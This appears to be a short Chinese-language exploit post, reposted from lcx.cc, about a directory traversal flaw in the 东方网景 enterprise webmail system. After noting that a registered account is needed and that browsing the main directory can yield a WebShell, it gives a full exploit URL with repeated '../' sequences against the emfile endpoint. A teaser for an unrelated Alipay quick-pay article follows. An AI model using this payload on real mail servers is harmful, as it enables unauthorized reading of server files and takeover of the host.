POC:
目录遍历,如果是子目录的话可以考虑,浏览主目录拿WebShell。
注册登陆邮箱系统
|
Exp: http://mail.xxxx.com.cn/webmail/emfile?action=file&todo=displayfolderfiles&FileURI=%2F.Files%2F.test/../../../../../../../../../../%2C%2C0 |
截图如下:
文章来源于lcx.cc:Exp - 东方网景企业邮箱系统目录遍历漏洞
相关推荐: 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章
支付宝快捷支付的开通方式: 第一种开通方式: 支付宝快捷支付的开通过程需要的资料:身份证、信用卡或借记卡(将来可能会支持活期存折或定期存折,支持活期存折的机会比较大,支持定期存折的机会很小,但要注意,在中国什么事都有可能发生。)、手机。开通时,只需输入姓名、身…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论